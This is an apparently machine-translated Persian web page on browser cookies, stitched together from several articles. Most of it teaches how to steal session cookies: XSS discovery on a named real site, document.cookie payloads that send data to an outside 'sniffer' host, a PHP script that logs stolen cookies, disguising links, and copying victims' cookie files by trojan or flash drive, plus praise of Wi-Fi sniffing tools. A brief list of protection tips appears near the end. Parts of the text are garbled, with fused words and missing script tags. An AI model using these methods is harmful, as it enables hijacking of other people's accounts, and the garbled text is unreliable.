دوست من رمز یک سایت را فراموش کرده است. با این حال، او قبلاً در زمان ورود به سیستم، کادر "Memember Me" را علامت زده بود. مرورگر گوگلکروم، که به او اجازه می داد با حساب کاربری خود وارد سایت شود. از من پرسیده شد که آیا می توان این حالت جادویی را به رایانه دیگری منتقل کرد؟ البته تغییر یا بازیابی رمز عبور صحیح تر است، اما آشنا به دلایل غیر مرتبط با پرونده نتوانسته این کار را انجام دهد.

نحوه استفاده از intercepter-ng برای آدمک ها

با وجود تنوع در انتخاب نرم افزارهای مدرن، یافتن برنامه هایی برای هک برای اندروید بهتر از intercepter ng دشوار است. اولین معیاری که به نفع این محصول است، عملکرد واقعی آن است. اکثر اسنیفرهای پیشنهادی در شبکه فقط یک تقلید هستند که عملکردهای اعلام شده را انجام نمی دهند.

فاکتورهای مثبت بعدی، تطبیق پذیری اپلیکیشن و پوشش طیف وسیعی از کاربران است.

کمک کامپیوتر 939-29-71

بیایید به ترتیب شروع کنیم. کوکی ها یا "کوکی ها" فایل های متنی بسیار کوچک هستند - نشانک هایی با اطلاعات.

وب سرور این اطلاعات را به مرورگر کاربر ارسال می کند. جایی که این اطلاعات تا زمانی که مورد نیاز باشد ذخیره می شود. کاملا مشخص نیست. خوب. خوب.

من سعی می کنم آن را حتی آسان تر کنم. دیدن. شما در هر سایتی ثبت نام کرده اید.

در زمان ثبت نام، همین "کوکی ها" ایجاد می شوند.

اینجا اند.

کوکی کیجر

این برنامه به ترافیک شبکه WiFi گوش می دهد، کوکی ها را رهگیری می کند و جلسه کاربر را در مرورگر شما تکرار می کند و درخواست ها را با اعتبار وی تکرار می کند. نویسنده متیو سالیوان برنامه را در 30 سپتامبر در کنفرانس هکر Derbycon ارائه کرد. درست در حین سخنرانی، متیو سالیوان یک جلسه ناامن با گوگل یکی از شرکت کنندگان در کنفرانس را از طریق WiFi رهگیری کرد.

چگونه کوکی ها را بدزدیم

اگر در حالی که در صفحه سایت هستید، وارد شوید نوار آدرس مرورگر فایرفاکسیا متن زیر را Opera کنید: javascript:document.write(document.cookie); چیزی شبیه به: remixAdminsBar=0; remixGroupType=0; remixpass=********************; remixwall=0; remixInformation=0; remixMembersBar=0; ریمیکس توضیحات=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 توجه! .

راهنمای کامل اسکریپت بین سایتی

XSS نوعی آسیب پذیری است نرم افزار، بومی برنامه های کاربردی وب است که به مهاجم اجازه می دهد تا اسکریپت سمت سرویس گیرنده را به صفحات وب مشاهده شده توسط سایر کاربران تزریق کند ویکی پدیا برای XSS تعریف زیر را دارد: «اسکریپت نویسی متقابل سایت (XSS) نوعی آسیب پذیری نرم افزاری است که بومی برنامه های کاربردی وب است. دور زدن محدودیت های امنیتی مرورگر)" که به مهاجم اجازه می دهد تا اسکریپت سمت سرویس گیرنده را به صفحات وب که توسط سایر کاربران مشاهده می شود تزریق کند.

تفاوت بین کوکی ها و جلسات

چندی پیش مقاله ای در مورد نحوه ثبت نام و اجازه دادن به کاربران در سایت نوشتم.

". در این مقاله، من قصد دارم تفاوت بین جلسات و کوکی ها را بررسی کنم. تا انتخاب نهایی خود را انجام دهید

بیسکویت ها. نه، این در مورد کوکی ها نیست، موضوع ایمنی شماست. بنابراین شما به سایت مورد علاقه خود "vkontakte" (یا، برای مثال، به ایمیل نگاه کنید) در رایانه شخص دیگری می روید، گزینه "ذخیره رمز عبور" را رد می کنید، با خوشحالی نامه را نگاه می کنید و ترک می کنید. و به این واقعیت فکر نکنید که اکنون می توانید به نام خود بروید شبکه اجتماعییا پست.

من حتی وضعیت برنامه ای را که بدون اینکه شما بدانید رمز عبور را به خاطر می آورد، در نظر نمی گیرم. این قبلاً یک هک عمدی است و احتمالاً مشکوک خواهید شد که چنین چیزی ممکن است رخ دهد و در چنین رایانه ای به سایت مورد علاقه خود نخواهید رفت. اما ما می توانیم در مورد کنجکاوی ساده انسانی صحبت کنیم - ما در حال بازدید از دوستان بودیم، و دوباره، و آنها این فرصت را پیدا می کنند که نامه شما را بخوانند. آیا مطمئن هستید که آنها چنین فرصتی را رد خواهند کرد؟ نمی ترسی چیزی پیش بیاد؟ در هر صورت، من مسائل اخلاقی را کنار می گذارم و فقط در مورد نحوه ذخیره اطلاعات در رایانه صحبت می کنم که اکنون می توانید بدون درخواست رمز عبور وارد برخی سایت ها شوید.

چگونه کوکی ها را بدزدیم

و نام این فناوری کوکی است.

و همه چیز از اینجا شروع شد. پروتکل http، که در واقع، سایت ها را مرور می کنید (از جمله این یکی) در ابتدا به معنای امکان حفظ اتصال نبود. یعنی به طور تقریبی شما یک درخواست به سایت می فرستید، پاسخ می گیرید، روی صفحه نمایش داده می شود و سپس سرور چیزی از شما به خاطر نمی آورد. البته این خوب است زمانی که سایت صرفاً اطلاعاتی است و نباید چیزی در مورد شما به خاطر بسپارد، اما ما در عصر وب 2.0 زندگی می کنیم. آنها را در پایگاه داده بنویسید، اما این کافی نیست.

بیایید به یک مثال بسیار ساده نگاه کنیم. انجمن. بنابراین شما ثبت نام کردید و سابقه ای در انجمن وجود دارد که فلان کاربر با فلان رمز عبور و اطلاعات اضافی دیگر وجود دارد. اما اکنون به انجمن بروید و وارد شوید - رمز عبور خود را وارد کنید. جایی باید اطلاعاتی وجود داشته باشد که شما وارد سیستم شده اید. روی سرور؟ البته که نه! ذخیره اطلاعات روی سروری که مجوز از رایانه شما صادر شده است غیرممکن است - نمی تواند شما را از شخص دیگری متمایز کند (حتی آدرس IP شما به طور منحصر به فرد شما را شناسایی نمی کند)! بنابراین، اطلاعاتی که مجوز انجام شده است باید در رایانه شما ذخیره شود. این چیزی است که کوکی ها برای این کار هستند، برای همین ساخته شده اند.

کوکی یک رکورد کوچک در رایانه شما است که اطلاعات سایتی را که بازدید کرده اید ذخیره می کند. پس از مجوز، یک ورودی مشابه ایجاد می شود، پس از آن می توانید در حال حاضر در انجمن قدم بزنید و شما را شناسایی می کند. با این حال، این به طور خودکار - به لطف اطلاعات ذخیره شده در کوکی - اتفاق می افتد - بنابراین تظاهر به اینکه شما مدیر اصلی انجمن هستید، باز هم با دور زدن تأیید رمز عبور کار نخواهد کرد.

اکنون می‌توانیم به جایی که این مقاله شروع شد بازگردیم. اگر حتی بدون ذخیره رمز عبور خود در جایی وارد شده اید، ممکن است اتفاقی بیفتد که یک ورودی در رایانه ایجاد شده است که اکنون به شما امکان می دهد بدون مجوز این منبع را تحت نام خود وارد کنید. خود چنین ورودی پس از مدتی منسوخ می شود، اما می توانید آن را مجبور کنید پاک شود. هر مرورگر این کار را متفاوت انجام می دهد، من به شما نشان خواهم داد که چگونه آن را در مورد علاقه من انجام دهید گوگل کروم. باز کردن گزینه ها

به تب "پیشرفته" بروید و دکمه "نمایش کوکی ها" را پیدا کنید

اکنون، البته، می‌توانید همه کوکی‌ها را حذف کنید، اما این می‌تواند صاحب رایانه را ناراحت کند. بنابراین به عنوان مثال در قسمت بالایی می توانید نام سایت مورد نظر خود را وارد کنید

سپس فقط کوکی های مربوط به این سایت را می توان پاک کرد. میتونی مال من رو امتحان کنی علاوه بر این، اگر وارد انجمن من شوید و سپس کوکی های خود را پاک کنید، اطلاعات مجوز فراموش می شود. آن را امتحان کنید!

نظرات ارائه شده توسط

1. XSS چیست
یک آسیب‌پذیری نوع XSS اجازه می‌دهد تا کد جاوا اسکریپت دلخواه را در بدنه یک صفحه وارد کنید. حمله XSSتفاوت با سایرین (مثلاً تزریق SQL یا تزریق PHP) در این است که نه بر روی سرور، بلکه بر روی مشتری.

چگونه کوکی ها را بدزدیم

با کمک آن، نمی توانید جداول پایگاه داده را مشاهده کنید، پوسته را آپلود کنید و غیره. رایج ترین استفاده از XSS برای سرقت کوکی ها است.
کوکی ها (کوکی ها) - یک قطعه کوچک از داده های ایجاد شده توسط یک وب سرور و ذخیره شده در کامپیوتر کاربر به عنوان یک فایل. معمولاً کوکی‌ها برای ذخیره حساب‌ها استفاده می‌شوند و اغلب حاوی رمز عبور رمزگذاری‌شده، ورود به سیستم و شناسه جلسه هستند. (البته نه همیشه)
XSS دو نوع فعال و غیر فعال هستند.

XSS غیرفعالاز قربانی بخواهید که مستقیماً شرکت کند، به عنوان مثال، پیوندی حاوی کد جاوا اسکریپت را دنبال کنید. هنگام استفاده از این نوع XSS، نمی توانید بدون SI (مهندسی اجتماعی) کار کنید.

XSS فعالبه هیچ مشارکتی از جانب قربانی نیاز ندارید، او فقط باید به صفحه ای با XSS برود. XSS فعال می تواند به عنوان مثال در پست های انجمن، چت ها، اضافه کردن اخبار و غیره باشد.

2. XSS را جستجو کنید
در این پاراگراف به شما خواهم گفت که چگونه xss را پیدا کنید

2.1 غیرفعال XSS
برای یافتن XSS غیرفعال، کافی است در فرم ورودی جایگزین کنیداگر اسکریپت کار کرد و پیام "xss" ظاهر شد، آسیب پذیری وجود دارد، اگر اسکریپت کار نکرد، همچنان می توانید "> را امتحان کنید.، این احتمالاً رایج ترین آسیب پذیری xss است. اگر نه یکی و نه اسکریپت دیگر کار نکرد، به احتمال زیاد هیچ آسیب‌پذیری وجود ندارد.
بیایید به یک مثال نگاه کنیم.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
فرم "جستجو" را ببینید؟ در آنجا قرار دهید ">و روی "یافتن" کلیک کنید
یک پنجره با xss بیرون زد، یعنی xss وجود دارد. (شاید در زمانی که این مقاله را می‌خوانید، این xss قبلاً رفع شده باشد)

2.2 XSS فعال
چنین CSS می تواند، به عنوان مثال، در فیلدهای نمایه، هنگام افزودن اخبار به نام اخبار و در خود اخبار (کمتر)، در پیام ها در انجمن ها / چت ها / دفترچه مهمان با html فعال باشد. همه چیز در اینجا ساده است، ما اسکریپت زیر پاراگراف قبلی را وارد فیلدها می کنیم و اگر پیام روی صفحه نمایش داده شود، آسیب پذیری وجود دارد.
xss را در برچسب های BB در انجمن ها در نظر بگیرید.
می توانید سعی کنید به طور احمقانه کد جاوا اسکریپت را در تگ وارد کنید، مانند این:
javascript:alert('xss')
برخی از تگ ها دارای پارامتر هستند، به عنوان مثال، تگ دارای پارامترهای dynsrc و lowsrc است، بیایید سعی کنیم کد را به صورت زیر جایگزین کنیم:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
اگر اسکریپت کار کرد، xss است

3. استفاده از XSS برای سرقت کوکی ها
حالا خوشمزه ترین
برای سرقت کوکی ها به یک وب اسنیفر نیاز داریم، می توانید نوعی اسنیفر را روی هاست خود نصب کنید یا می توانید از یک اسنیفر آنلاین استفاده کنید که اکنون پر شده است.
برای سرقت کوکی ها از طریق XSS غیرفعال، قربانی باید یک پیوند سمی را دنبال کند. برای سرقت کوکی ها به جای آن استفاده خواهیم کرداسکریپت دیگر:
ما اسکریپت را در لینک جایگزین می کنیم و اجازه می دهیم قربانی آن را دنبال کند، لاگ sniffer را ببینید و خوشحال شوید.
بیایید به یک مثال نگاه کنیم.
بیایید آن XSS را روی رامبلر از پاراگراف قبلی بگیریم.
چسباندن
">
در فرم جستجو، روی "یافتن" کلیک کنید، به نوار آدرس نگاه کنید و ببینید:

http://miss.rambler.ru/srch/?sort=0& … &words =">
ما این لینک را برای قربانی می اندازیم و از کوکی ها لذت می بریم.
با دیدن چنین پیوندی، قربانی ممکن است به چیزی مشکوک شود، بنابراین توصیه می شود رمزگذاری شود
">
در URL یا از خدماتی مانند http://tinyurl.com/ استفاده کنید
بیایید به XSS فعال برویم، همه چیز در اینجا ساده است، به جای alert() img = new Image(); img.src = "sniffer image address"+document.cookie;

حالا ما کوکی داریم. اما با آنها چه باید کرد؟ ساده است، آنها باید به جای خودشان جایگزین شوند. AT مرورگر اپرایک ویرایشگر کوکی داخلی وجود دارد (ابزارها-> پیشرفته-> مدیریت کوکی)، یک پلاگین برای فایرفاکس وجود دارد (نام را به خاطر ندارم، از گوگل استفاده کنید)
فعلاً همین است، شاید مقاله تکمیل شود

به این سؤال که چگونه کوکی‌های کوکی‌ها را دریافت کنیم. به کوکی نیاز دارم که چگونه می توان آن را دریافت کرد لطفا به من بگویید!!! 1 مجموعه توسط نویسنده ولاد ایههههههههبهترین پاسخ این است کوکی ها چیست؟
واقعیت این است که در روند توسعه فناوری های www و معرفی زبان های برنامه نویسی در اینترنت، یک مشکل بسیار جدی پیش روی توسعه دهندگان برنامه ها ایجاد شد - نحوه ذخیره نتایج اجرای الگوریتم برای هر کاربر خاص در برای مدت طولانی? پروتکل HTTP به خودی خود توانایی گرفتن نتایج فرآیندهای نرم افزاری را ندارد. استفاده از جلسات نیز راه حلی برای مشکل نیست، زیرا عملکرد آنها بلافاصله پس از قطع شدن اتصال به سرور خاتمه می یابد.
مشکل با معرفی مکانیسم کوکی ها (یعنی ترجمه شده از انگلیسی "کوکی ها") حل شد. کوکی ها دارای ویژگی قابل توجهی هستند - آنها در هارد دیسک کاربر ذخیره می شوند و می توانند برای مدت تقریبا نامحدودی در آنجا ذخیره شوند.
در هسته خود، کوکی ها فایل های متنی ساده ای هستند که در یک فهرست خاص که توسط مرورگر استفاده می شود (معمولاً به نام فایل های موقت اینترنت) ذخیره می شوند و با رفتن به این دایرکتوری می توانید آنها را مشاهده کنید. دسترسی سریعبرای مرورگر اینترنت اکسپلورر از طریق آیتم های منو ابزارها -> گزینه های اینترنت -> فایل های اینترنتی موقت -> تنظیمات -> مشاهده انجام می شود.
برخی از کوکی ها فقط برای یک جلسه قابل ذخیره هستند، پس از بسته شدن مرورگر حذف می شوند. سایرین که برای مدت زمان معینی تنظیم شده اند، در یک فایل نوشته می شوند. به طور کلی، این فایل "cookies.txt" نامیده می شود (اما ممکن است چندین مورد وجود داشته باشد) و در فهرست کار مرورگر نصب شده روی رایانه قرار دارد.
به عبارت دیگر
کوکی یک قطعه کوچک از اطلاعات متنی است که سرور برای مرورگر ارسال می کند. کوکی ها به خودی خود نمی توانند کاری انجام دهند، اما زمانی که کاربر به سرور دسترسی پیدا می کند (آدرس خود را در خط مرورگر تایپ می کند)، سرور می تواند اطلاعات موجود در کوکی ها را بخواند و بر اساس تجزیه و تحلیل خود، هر اقدامی را انجام دهد. به عنوان مثال، در مورد دسترسی مجاز به چیزی از طریق وب، ورود و رمز عبور در کوکی ها در طول جلسه ذخیره می شود، که به کاربر اجازه می دهد در هنگام درخواست هر سند محافظت شده با رمز عبور، آنها را دوباره وارد نکند.
اگر می‌خواهید از طریق این مبحث به حساب‌های محافظت‌شده با رمز عبور شخص دیگری دسترسی پیدا کنید، باید راهی را از راه دور (تروجان) یا با کپی کردن گستاخانه در فلش درایو پیدا کنید، اگر به رایانه‌ای که قربانی در آن کار می‌کند دسترسی دارید. این فایل cookie.txt را کپی کنید و آن را در مرورگر خود (همان) روی آن جایگزین کنید. سپس به سایت مورد نظر که در آن اکانت مورد نظر شماست رفته و به صورت خودکار به آن دسترسی پیدا می کنید. اما به خاطر داشته باشید، اگر قربانی در پایان کار خروج از حساب (مثلاً از ایمیل) را فشار دهد، اطلاعات جلسه در کوکی ها پاک می شود و شما هیچ دسترسی نخواهید داشت.
موزیلا فایرفاکس کوکی ها را در نمایه کاربر، در فایل C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles ذخیره می کند.<имя профиля>cookies.txt
nternet explorer این کوکی ها را به عنوان فایل متنی جداگانه در پوشه C:Documents and SettingsUsernameCookies ذخیره می کند.
Opera کوکی ها را در فایل C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat ذخیره می کند.

بیسکویت ها - اطلاعات در قالب یک فایل متنی که توسط وب سایت در رایانه کاربر ذخیره می شود. حاوی داده های احراز هویت (ورودی / رمز عبور، شناسه، شماره تلفن، آدرس). صندوق پستی)، تنظیمات کاربر، وضعیت دسترسی. در نمایه مرورگر ذخیره می شود.

هک کوکی دزدی (یا "ربایش") جلسه بازدیدکننده به یک منبع وب است. اطلاعات محرمانه نه تنها برای فرستنده و گیرنده، بلکه برای شخص ثالث - شخصی که رهگیری کرده است، در دسترس قرار می گیرد.

ابزارها و تکنیک های هک کوکی ها

سارقان رایانه، مانند همکاران خود در زندگی واقعی، علاوه بر مهارت، مهارت و دانش، البته، ابزارهای خاص خود را نیز دارند - نوعی زرادخانه از کلیدها و پروب های اصلی. بیایید با محبوب ترین ترفندهای هکرها آشنا شویم که از آنها برای گرفتن کوکی از ساکنان اینترنت استفاده می کنند.

اسنیفرها

برنامه های ویژهبرای نظارت و تجزیه و تحلیل ترافیک شبکه نام آنها از فعل انگلیسی "sniff" (sniff) گرفته شده است، زیرا. بسته های ارسالی بین گره ها به معنای واقعی کلمه "بو کشیدن" است.

اما مهاجمان از یک sniffer برای رهگیری داده‌های جلسه، پیام‌ها و موارد دیگر استفاده می‌کنند اطلاعات محرمانه. هدف حملات آنها عمدتاً شبکه های ناامن هستند، جایی که کوکی ها در یک جلسه HTTP باز ارسال می شوند، یعنی عملاً رمزگذاری نمی شوند. (وای فای عمومی آسیب پذیرترین است.)

روش های زیر برای تزریق sniffer به کانال اینترنت بین میزبان کاربر و وب سرور استفاده می شود:

  • "گوش دادن" به رابط های شبکه (هاب ها، سوئیچ ها)؛
  • انشعاب و کپی ترافیک؛
  • اتصال به قطع کانال شبکه؛
  • تجزیه و تحلیل از طریق حملات ویژه که ترافیک قربانی را به یک sniffer هدایت می کند (MAC-spoofing، IP-spoofing).

مخفف XSS مخفف Cross Site Scripting است. برای حمله به وب سایت ها به منظور سرقت اطلاعات کاربران استفاده می شود.

روش کار XSS به شرح زیر است:

  • یک مهاجم کد مخرب (یک اسکریپت پنهان شده خاص) را به صفحه وب یک وب سایت، انجمن یا در یک پیام (مثلاً هنگام چت در یک شبکه اجتماعی) تزریق می کند.
  • قربانی از صفحه آلوده بازدید می کند و فعال می شود کد را تنظیم کنیددر رایانه شخصی شما (کلیک می کند، پیوند را دنبال می کند، و غیره)؛
  • به نوبه خود، کد مخرب فعال شده، داده های محرمانه کاربر را از مرورگر (به ویژه کوکی ها) "استخراج" می کند و آنها را به وب سرور مهاجم ارسال می کند.

هکرها برای «کاشتن» مکانیزم نرم‌افزاری XSS از انواع آسیب‌پذیری‌ها در سرورهای وب، سرویس‌های آنلاین و مرورگرها استفاده می‌کنند.

تمام آسیب پذیری های XSS به دو نوع تقسیم می شوند:

  • منفعل. حمله با پرس و جو از یک اسکریپت صفحه وب خاص به دست می آید. کد مخربرا می توان به اشکال مختلف در یک صفحه وب (به عنوان مثال، در نوار جستجو در یک سایت) وارد کرد. مستعدترین نسبت به XSS غیرفعال منابعی هستند که تگ های HTML را هنگام رسیدن داده ها فیلتر نمی کنند.
  • فعال. مستقیماً روی سرور قرار دارد. و در مرورگر قربانی فعال می شوند. آنها به طور فعال توسط کلاهبرداران در وبلاگ ها، چت ها و فیدهای خبری مختلف استفاده می شوند.

هکرها با دقت اسکریپت های XSS خود را "استتار" می کنند تا قربانی به چیزی مشکوک نشود. آنها پسوند فایل را تغییر می دهند، کد را به عنوان تصویر ارسال می کنند، آنها را تشویق می کنند که پیوند را دنبال کنند، آنها را با محتوای جالب جذب می کنند. در نتیجه: یک کاربر رایانه شخصی که با کنجکاوی خود کنار نیامده است، با دست خود (با یک کلیک ماوس) کوکی های جلسه (با ورود به سیستم و رمز عبور!) را برای نویسنده اسکریپت XSS - یک شرور رایانه ارسال می کند.

جعل کوکی

همه کوکی‌ها بدون هیچ تغییری - به شکل اصلی - با همان مقادیر، رشته‌ها و سایر داده‌ها، ذخیره می‌شوند و به سرور وب (که از آنجا آمده‌اند) ارسال می‌شوند. اصلاح عمدی پارامترهای آنها را جعل کوکی می گویند. به عبارت دیگر، هنگامی که یک کوکی جعل می شود، مهاجم در فکر آرزو است. به عنوان مثال، هنگام پرداخت در یک فروشگاه آنلاین، مقدار پرداخت در کوکی به سمت کوچکتر تغییر می کند - بنابراین "پس انداز" در خرید وجود دارد.

کوکی‌های جلسه دزدیده شده در یک شبکه اجتماعی از حساب شخص دیگری در جلسه دیگری و در رایانه شخصی دیگر "درج" می‌شوند. صاحب کوکی های دزدیده شده دریافت می کند دسترسی کاملبه حساب قربانی (مکاتبات، محتوا، تنظیمات صفحه) تا زمانی که او در صفحه خود باشد.

"ویرایش" کوکی ها با استفاده از موارد زیر انجام می شود:

  • توابع "مدیریت کوکی ها ..." در مرورگر Opera.
  • افزونه‌ها مدیر کوکی‌ها و مدیر کوکی پیشرفته برای فایرفاکس.
  • ابزارهای IECookiesView (فقط برای اینترنت اکسپلورر)؛
  • ویرایشگر متنمانند AkelPad، NotePad یا Notepad ویندوز.

دسترسی فیزیکی به داده ها

بسیار مدار سادهپیاده سازی شامل چندین مرحله است. اما تنها در صورتی موثر است که کامپیوتر قربانی با جلسه باز، به عنوان مثال Vkontakte، بدون مراقبت رها می شود (و برای مدت طولانی!):

  1. وارد نوار آدرس مرورگر شوید تابع جاوا اسکریپت، که تمام کوکی های ذخیره شده را نمایش می دهد.
  2. پس از فشار دادن "ENTER" همه آنها در صفحه ظاهر می شوند.
  3. کوکی ها کپی می شوند، در یک فایل ذخیره می شوند و سپس به یک درایو فلش منتقل می شوند.
  4. در رایانه دیگری، کوکی‌ها در جلسه جدیدی جایگزین می‌شوند.
  5. دسترسی به حساب قربانی باز می شود.

به عنوان یک قاعده، هکرها از ابزارهای فوق (+ ابزارهای دیگر) هم به صورت ترکیبی (زیرا سطح حفاظت در بسیاری از منابع وب بسیار بالا است) و هم به طور جداگانه (زمانی که کاربران بیش از حد ساده لوح هستند) استفاده می کنند.

XSS + sniffer

  1. یک اسکریپت XSS ایجاد می شود که آدرس sniffer آنلاین (محصول خود یا یک سرویس خاص) را مشخص می کند.
  2. کد مخرب با پسوند img. (فرمت تصویر) ذخیره می شود.
  3. سپس این فایل در صفحه سایت، چت یا پیام شخصی آپلود می شود - جایی که حمله انجام خواهد شد.
  4. توجه کاربر به "تله" ایجاد شده جلب می شود (در اینجا مهندسی اجتماعی وارد عمل می شود).
  5. اگر «تله» کار کند، کوکی‌های مرورگر قربانی توسط اسنیفر رهگیری می‌شوند.
  6. کراکر سیاهههای مربوط به اسنیفر را باز می کند و کوکی های دزدیده شده را استخراج می کند.
  7. سپس با استفاده از ابزارهای فوق، یک جایگزین برای به دست آوردن حقوق صاحب حساب انجام می دهد.

محافظت از کوکی ها در برابر هک شدن

  1. از یک اتصال رمزگذاری شده (با استفاده از پروتکل ها و روش های امنیتی مناسب) استفاده کنید.
  2. به پیوندهای مشکوک، تصاویر، پیشنهادات وسوسه انگیز برای آشنایی با "نرم افزار رایگان جدید" پاسخ ندهید. مخصوصاً از غریبه ها.
  3. فقط از منابع وب قابل اعتماد استفاده کنید.
  4. یک جلسه مجاز را با فشار دادن دکمه "خروج" (و نه فقط بستن برگه!) پایان دهید. به خصوص اگر حساب کاربری با آن وارد نشده باشد کامپیوتر شخصی، اما، برای مثال، از رایانه شخصی در یک کافی نت.
  5. از ویژگی «ذخیره رمز عبور» مرورگر خود استفاده نکنید. داده های ثبت شده ذخیره شده در برخی مواقع خطر سرقت را افزایش می دهد. تنبل نباشید، در ابتدای هر جلسه چند دقیقه وقت خود را برای وارد کردن رمز عبور و ورود به سیستم اختصاص ندهید.
  6. پس از گشت و گذار در وب - بازدید از شبکه های اجتماعی، انجمن ها، چت ها، سایت ها - کوکی های ذخیره شده را حذف کنید و کش مرورگر را پاک کنید.
  7. مرورگرها و نرم افزارهای آنتی ویروس را به طور منظم به روز کنید.
  8. از افزونه های مرورگر استفاده کنید که در برابر حملات XSS محافظت می کنند (به عنوان مثال، NoScript برای FF و Google Chrome).
  9. به صورت دوره ای در حساب ها.

و مهمتر از همه - هنگام استراحت یا کار در اینترنت هوشیاری و توجه خود را از دست ندهید!

کوکی چیست؟

مکانیزمی وجود دارد که به سرور http اجازه می دهد مقداری را در رایانه کاربر ذخیره کند اطلاعات متنیو سپس با او تماس بگیرید این اطلاعاتبه نام کوکی در واقع، هر کوکی یک جفت است: نام پارامتر و مقدار آن. به هر کوکی دامنه ای که به آن تعلق دارد نیز اختصاص داده می شود. برای اهداف امنیتی، در همه مرورگرها، سرور http فقط مجاز به دسترسی به کوکی دامنه خود است. علاوه بر این، کوکی‌ها می‌توانند تاریخ انقضا داشته باشند، در این صورت حتی اگر تمام پنجره‌های مرورگر بسته باشند، تا این تاریخ در رایانه ذخیره می‌شوند.


چرا کوکی ها مهم هستند؟

در تمام سیستم های چند کاربره، از کوکی ها برای شناسایی کاربر استفاده می شود. یا بهتر است بگوییم ارتباط فعلی کاربر با سرویس، جلسه کاربر. اگر شخصی کوکی های شما را بشناسد، می تواند از طرف شما وارد سیستم شود. زیرا در این لحظهتعداد کمی از منابع اینترنتی تغییر آدرس IP را در طول یک جلسه کاربر بررسی می کنند.


چگونه کوکی ها را تغییر دهیم یا تغییر دهیم؟

توسعه دهندگان مرورگر ابزارهای داخلی را برای ویرایش کوکی ها ارائه نمی کنند. اما می توانید با یک دفترچه یادداشت معمولی (دفترچه یادداشت) از پس آن بربیایید.


مرحله 1: ایجاد فایل متنیبا متن

پنجره ها ویرایشگر رجیسترینسخه 5.00



@="C:\\IE_ext.htm"

ما آن را با نام IE_ext.reg ذخیره می کنیم

مرحله 2: با استفاده از فایل ایجاد شده، تغییرات را به رجیستری ویندوز اضافه کنید.

مرحله 3: یک فایل متنی با متن ایجاد کنید

< script language="javascript">
external.menuArguments.clipboardData.setData("متن"، external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
هشدار (external.menuArguments.document.cookie);


آن را به عنوان C:\IE_ext.htm ذخیره کنید

مرحله 4: به وب سایت مورد علاقه خود می رویم.

مرحله 5: کلیک راستکلیک ماوس بر روی فضای خالیصفحه و آیتم منو را انتخاب کنید "کار با کوکی ها". اجازه دسترسی به کلیپ بورد. کوکی های شما برای این سایت در کلیپ بورد قرار می گیرد. می توانید دفترچه یادداشت آنها را بچسبانید (نوت پد) و ببینید.


مرحله 6: برای تغییر برخی از کوکی ها، فایل C:\IE_ext.htm را ویرایش کنید و جایگزین کنید. نام آزمونبه نام کوکی، ارزش تست- در معنای آن، testdomain.com- به دامنه وب سایت. در صورت لزوم خطوط بیشتری مانند این اضافه کنید. برای راحتی کنترل، من خروجی کوکی های فعلی را قبل و بعد از تغییر به اسکریپت اضافه کردم: هشدار (external.menuArguments.document.cookie);

مرحله 7: مرحله 5 را دوباره اجرا کنید و سپس صفحه را Refresh کنید.

خط پایین: ما با کوکی های به روز شده به این منبع اینترنتی خواهیم رفت.

چگونه با جاوا اسکریپت کوکی ها را بدزدیم؟

اگر مهاجم موفق شد فرصتی برای اجرای یک اسکریپت جاوا اسکریپت دلخواه بر روی رایانه قربانی پیدا کند، سپس بخوانید کوکی های فعلیاو خیلی راحت می تواند مثال:


varstr=document.cookie;

اما آیا او می تواند آنها را به سایت خود منتقل کند، زیرا همانطور که قبلاً اشاره کردم، یک اسکریپت جاوا اسکریپت نمی تواند تایید اضافیبه سایتی که در دامنه دیگری قرار دارد دسترسی داشته باشید؟ به نظر می رسد که یک اسکریپت جاوا اسکریپت می تواند هر تصویری را که در هر سرور http قرار دارد بارگیری کند. در عین حال هرگونه اطلاعات متنی در درخواست دانلود را به این تصویر منتقل کنید. مثال: http://hackersite.ru/xss.jpg?text_infoبنابراین اگر این کد را اجرا کنید:

varimg= عکس جدید()؛

img.src= "http://hackersite.ru/xss.jpg؟"+ encodeURI (document.cookie)؛


سپس کوکی در درخواست دانلود "تصویر" و "سپردن" به مهاجم خواهد بود.

چگونه می توان با چنین درخواست هایی برای آپلود یک "تصویر" برخورد کرد؟

یک مهاجم فقط باید میزبانی را با آن پیدا کند پشتیبانی از phpو کد را مانند این قرار دهید:

$uid=urldcode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt"،"a");
fputs($fp,"$uid\n");
fclose($fp);
?>

سپس تمام پارامترهای پرس و جو در این اسکریپت در فایل ذخیره می شود log.txt. فقط در اسکریپت جاوا اسکریپت که قبلاً توضیح داده شد برای جایگزینی باقی می ماند http://hackersite.ru/xss.jpgبه مسیر این اسکریپت php.


نتیجه

من فقط ساده ترین راه را برای بهره برداری از آسیب پذیری های XSS نشان داده ام. اما ثابت می‌کند که وجود حداقل یکی از این آسیب‌پذیری‌ها در یک سایت اینترنتی چند کاربره می‌تواند به مهاجم اجازه دهد تا از منابع آن از طرف شما استفاده کند.

Opera منوی اصلی را باز کنید، به بخش "تنظیمات" بروید و خط " را انتخاب کنید. تنظیمات عمومی...». و شما فقط می توانید داغ فشار دهید کلیدهای CTRL+ F12. با این کار پنجره تنظیمات مرورگر باز می شود، جایی که در تب "Advanced" باید روی بخش "کوکی ها" در پنجره سمت چپ کلیک کنید. در آن، باید روی دکمه "مدیریت کوکی ها" کلیک کنید.

AT موزیلا فایرفاکسبخش "ابزار" را در منو باز کنید و مورد "تنظیمات" را انتخاب کنید. در پنجره تنظیمات، باید به تب "Privacy" بروید، دکمه ای را که روی آن می گوید "Show Cookies ..." را پیدا کنید و روی آن کلیک کنید تا به لیست کوکی های ذخیره شده توسط مرورگر دسترسی پیدا کنید. در اینجا می توان آنها را جستجو و مشاهده کرد.

در اینترنت اکسپلورر، بخش "ابزار" را در منو گسترش دهید و "Properties" را انتخاب کنید. در پنجره تنظیمات ویژگی، به تب General رفته و در قسمت Browsing History روی دکمه Options کلیک کنید. به این ترتیب، پنجره دیگری ("گزینه های فایل موقت") باز می شود که در آن باید روی دکمه "نمایش فایل ها" کلیک کنید.

